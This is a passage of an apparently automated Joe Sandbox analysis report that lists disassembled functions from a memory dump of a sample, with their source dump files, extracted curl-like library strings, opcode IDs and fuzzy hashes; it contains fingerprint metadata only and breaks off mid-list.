                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $d$nil)
                                  • API String ID: 0-394766432
                                  • Opcode ID: e3ee0bf0b3cfa2117f7e7f8fdda4ddd5e182edc06c92577cbce7a374e2a7f246
                                  • Instruction ID: b663d0008c4a1009aa16395aac1aa3e8f73bd08e3ce89c57175cd8b1d1d0aa45
                                  • Opcode Fuzzy Hash: e3ee0bf0b3cfa2117f7e7f8fdda4ddd5e182edc06c92577cbce7a374e2a7f246
                                  • Instruction Fuzzy Hash: 7A139D706083018FD726DF2CC09062ABBE5BFC9718F144E6DEA959B3A5D771E845CB82
                                  Function 00F94940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                  • API String ID: 0-122532811
                                  • Opcode ID: 0d09d865bc7e4047afec65f3420e2a81ef5ab88c6df4f25654174afdf19d1759
                                  • Instruction ID: 98f8bc85ba791598ec98ec612acb31bd3c3b51c1538687628d73728f590b8b25
                                  • Opcode Fuzzy Hash: 0d09d865bc7e4047afec65f3420e2a81ef5ab88c6df4f25654174afdf19d1759
                                  • Instruction Fuzzy Hash: 65421771B08701AFE709DE28CC81B6BB7EAEBD4704F04892CF54D97291D775A8049B92
                                  Function 01039880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                  • API String ID: 0-1574211403
                                  • Opcode ID: c5f5b889dd9f55f97f86532bdc0a665ef113f0604b66735adb551659331664ef
                                  • Instruction ID: c5741eeff8423b2d682fc1e6d56f1c058d52103b9c4bc2aabd15e992859d6b49
                                  • Opcode Fuzzy Hash: c5f5b889dd9f55f97f86532bdc0a665ef113f0604b66735adb551659331664ef
                                  • Instruction Fuzzy Hash: 5561F8E5E0830267E758A628DD51B7FB6DD9BE5308F04843DFDCA96282FAB1D9048253
                                  Function 00FA4F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                  • API String ID: 0-1914377741
                                  • Opcode ID: 5477e347538c1f652ff266a7dfd39a28676e056a8e4528a912888a2ee702e069
                                  • Instruction ID: b1ee253e363eb91f7467aad014840b6c5d333ef481b31ba08208429cd9cb8008
                                  • Opcode Fuzzy Hash: 5477e347538c1f652ff266a7dfd39a28676e056a8e4528a912888a2ee702e069
                                  • Instruction Fuzzy Hash: 8D726CB1E08B419FE7318A28C5467A7B7D26F92B54F08861CEC844F293E776DC84E791
                                  Function 0104EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$;$?$?$xn--$xn--
                                  • API String ID: 0-543057197
                                  • Opcode ID: 32417d742cc29962346f79ca6b6e3974abad01a4dffef011b8a28edc5612f78c
                                  • Instruction ID: 492787effeb8799316ae269e65b7fcded2bb7ac6dd3543fbc7bee2ba8892e8f6
                                  • Opcode Fuzzy Hash: 32417d742cc29962346f79ca6b6e3974abad01a4dffef011b8a28edc5612f78c
                                  • Instruction Fuzzy Hash: 6222E5F2A04303ABEB519A2C9CC0B6F76E4AF95348F04457CF9C997296EB35D904C792
                                  Function 00F8A960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: baf5e70dc52a6fe09232c68e35e6ae290924ab6812f23c63c6c499ed37214977
                                  • Instruction ID: 6ff593ef17b77d5b2072b0649e978900ca33137313da2aa79626824edaa39a42
                                  • Opcode Fuzzy Hash: baf5e70dc52a6fe09232c68e35e6ae290924ab6812f23c63c6c499ed37214977
                                  • Instruction Fuzzy Hash: D6C2AF32A087418FD714DF28C4907AAB7E2FFC9364F19892DE8999B351D730ED459B82
                                  Function 00F8E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: 348b99e021840de77e2cfbea6b6ba32b6b41c08c74b81a3183eee1abfbc01d48
                                  • Instruction ID: 5dbdc20e10d63eece9ffa9f9f71277a1f2cb21283d1efc9095ee67b6478a2f0b
                                  • Opcode Fuzzy Hash: 348b99e021840de77e2cfbea6b6ba32b6b41c08c74b81a3183eee1abfbc01d48
                                  • Instruction Fuzzy Hash: 8F82B071A083019FD714EE28C8847ABB7E1AFD5724F148A7DF8A997291D730DC49DB82
                                  Function 00FE6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: default$login$macdef$machine$netrc.c$password
                                  • API String ID: 0-1043775505
                                  • Opcode ID: 6ded661f0045045872edf0f4766b98ef8e5d123143a25a710c4ee359d611c596
                                  • Instruction ID: c9cd2d359f1b23c9e72f15c9d2280e04ca5cfb27047ef572d1b60369050893dc
                                  • Opcode Fuzzy Hash: 6ded661f0045045872edf0f4766b98ef8e5d123143a25a710c4ee359d611c596
                                  • Instruction Fuzzy Hash: 4FE129719083C59BE7119F12884672B7BD0AFA5798F18082CF8C5DB381D7B9D948E7A2
                                  Function 00FEA7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                  • API String ID: 0-4201740241
                                  • Opcode ID: e58db08e04a21979f2bc87725a7a3d4547329f6a03c6cc85fa971ebc1950ba3c
                                  • Instruction ID: 2200aeacafdc1700dd50c245b88e09a1359ee5d737e3fabedfc9c3680eabb47e
                                  • Opcode Fuzzy Hash: e58db08e04a21979f2bc87725a7a3d4547329f6a03c6cc85fa971ebc1950ba3c
                                  • Instruction Fuzzy Hash: 7362D0B09147819BD715CF25C8907AAB3E4FF98304F04962DE88D8B352E774FA94CB96
                                  Function 0103C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                  • API String ID: 0-3285806060
                                  • Opcode ID: 4cd9bb2f49bfeb52c2cc9255db5e8c9fa857b63b9ba7d3714b973ee8c4d074ca
                                  • Instruction ID: 42e9fb79ac5b827486d9c34af7b6a06794c0d7b420707bcdff8870b15912c260
                                  • Opcode Fuzzy Hash: 4cd9bb2f49bfeb52c2cc9255db5e8c9fa857b63b9ba7d3714b973ee8c4d074ca
                                  • Instruction Fuzzy Hash: FDD11872A083018BF725DE28CA5437EBBD9AFD5314F05896EF9C5E7281DB709944C742
                                  Function 0130CC90 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$@$gfff$gfff
                                  • API String ID: 0-2633265772
                                  • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction ID: 09c926bb8372edc2a696b1e479e8ac2b293c6214a2658853d6a33ea57896b185
                                  • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction Fuzzy Hash: D8D1C37160470A8BD716DF6CC8A031BBBE2AF84358F08CA6DE9498B785D770DD49C792
                                  Function 013117A0 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
